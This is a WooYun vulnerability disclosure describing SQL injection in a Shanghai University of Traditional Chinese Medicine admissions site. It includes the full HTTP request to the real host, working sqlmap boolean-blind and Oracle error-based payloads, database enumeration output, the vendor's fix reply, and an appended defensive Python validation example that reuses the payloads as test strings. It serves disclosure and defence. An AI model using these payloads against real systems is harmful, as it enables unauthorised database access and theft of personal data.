
Vulnerability summary

Defect ID: wooyun-2015-0159756

Title: SQL injection in a site of Shanghai University of Traditional Chinese Medicine

Vendor: Shanghai University of Traditional Chinese Medicine (上海中医药大学)

Author: 路人甲

Submitted: 2015-12-10 11:07

Fixed: 2016-01-25 18:01

Published: 2016-01-25 18:01

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-10: Details sent to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details visible to the vendor only
2015-12-24: Details disclosed to core white hats and domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public

Brief description:

As in the title.

Details:

http://ygzs.shutcm.edu.cn/  Shanghai University of Traditional Chinese Medicine "Sunshine Admissions" information platform


POST /Pages/EnrolRegistUpGradeScore.aspx HTTP/1.1
Content-Length: 429
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ygzs.shutcm.edu.cn
Cookie: ASP.NET_SessionId=dzywts5rl2aqqidbfpvwlz5m; CNZZDATA1254023599=1912620956-1449309629-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1449309629; bdshare_firstime=1449310636107
Host: ygzs.shutcm.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKYoPnfBgK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8%2b4K2aAdHUn7sWQjApfH5/KQWD2geJ03DnGCoV5QDGbcFb0%3d&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWAgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZGRAMQgveRc08S8Pa8khCOyeKCo839CL2vVMzZPZNr%2bDIQ%3d%3d


The txtCkbmh parameter is injectable.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtCkbmh (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-2022' OR 5183=5183 AND 'HZWU'='HZWU&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg==
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1' AND 7827=CTXSYS.DRITHSX.SN(7827,(CHR(113)||CHR(113)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7827=7827) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(118)||CHR(113))) AND 'epVS'='epVS&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg==
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 4.0.30128
back-end DBMS: Oracle
current user: 'XUEGONG'
current schema (equivalent to database on Oracle): 'XUEGONG'
current user is DBA: False
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XDB
[*] XUEGONG


Database: XUEGONG

Proof of vulnerability:

Fix recommendation:

Copyright: credit the source when reposting: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-12-14 14:29

Vendor reply:

In the score query for the junior-college-to-bachelor (专升本) upgrade exam, the ID-card text box now has regular-expression validation, and other text boxes, such as the spring-admission registration number, now have numeric validation.

Latest status:

None yet
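As an added defensive example (not code from the report or from the university's application), the following Python sketch shows the two controls that close this finding: the per-field allow-list validation the vendor describes, and a bind-variable query so the submitted value never reaches the SQL text. The form field names and the two sqlmap payloads are taken from the report; the regex patterns, the column names, the __VIEWSTATE placeholder and the sample numbers are assumptions.

```python
import re
from urllib.parse import parse_qs

# Allow-list per form field. The vendor described a regex on the ID-card box and numeric
# validation on the registration-number box; the exact patterns below are assumed.
# [0-9] rather than \d so that non-ASCII Unicode digits are not accepted.
FIELD_RULES = {
    "txtCkbmh": re.compile(r"[0-9]{1,20}"),     # spring-admission registration number: digits only
    "txtIdenty": re.compile(r"[0-9]{17}[0-9X]"), # PRC ID card: 17 digits plus a check digit or X
    "ddlYear": re.compile(r"[0-9]{4}"),          # admission year
}

# Hypothetical bind-variable query (Oracle ":name" syntax); table and column names are assumed.
SAFE_SQL = ("SELECT * FROM ENROLUPGRADEDSCORE "
            "WHERE CKBMH = :ckbmh AND IDENTY = :identy AND ENROL_YEAR = :year")

def validate_form(body: str) -> dict:
    """Return {field: reason} for every field that is missing, duplicated, or off the allow-list."""
    params = parse_qs(body, keep_blank_values=True)
    problems = {}
    for field, rule in FIELD_RULES.items():
        values = params.get(field, [])
        if len(values) != 1:                      # absent, or repeated (parameter pollution)
            problems[field] = "expected exactly one value"
        elif not rule.fullmatch(values[0]):
            problems[field] = "does not match allow-list pattern"
    return problems

def build_query(body: str):
    """Return (sql, binds) for a validated body, or None if any field is rejected.
    User input only ever travels in the bind dictionary, never in the SQL string."""
    if validate_form(body):
        return None
    p = parse_qs(body, keep_blank_values=True)
    binds = {"ckbmh": p["txtCkbmh"][0], "identy": p["txtIdenty"][0], "year": p["ddlYear"][0]}
    return SAFE_SQL, binds

# Constructed sample bodies: field names and the two sqlmap payloads follow the report;
# __VIEWSTATE is a placeholder and the legitimate-looking numbers are made up.
LEGIT_BODY = ("btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=20150001"
              "&txtIdenty=310101199001011234&__VIEWSTATE=PLACEHOLDER")
BOOLEAN_BLIND_BODY = ("btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015"
                      "&txtCkbmh=-2022' OR 5183=5183 AND 'HZWU'='HZWU&txtIdenty=1&__VIEWSTATE=PLACEHOLDER")
ERROR_BASED_BODY = ("btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1' AND 7827=CTXSYS.DRITHSX.SN(7827,"
                    "(CHR(113)||CHR(113)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7827=7827) THEN 1 ELSE 0 END)"
                    " FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(118)||CHR(113))) AND 'epVS'='epVS"
                    "&txtIdenty=1&__VIEWSTATE=PLACEHOLDER")
```

Validation only narrows the accepted input space; the bind variable is the control that actually stops injection, so the two belong together rather than either alone.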

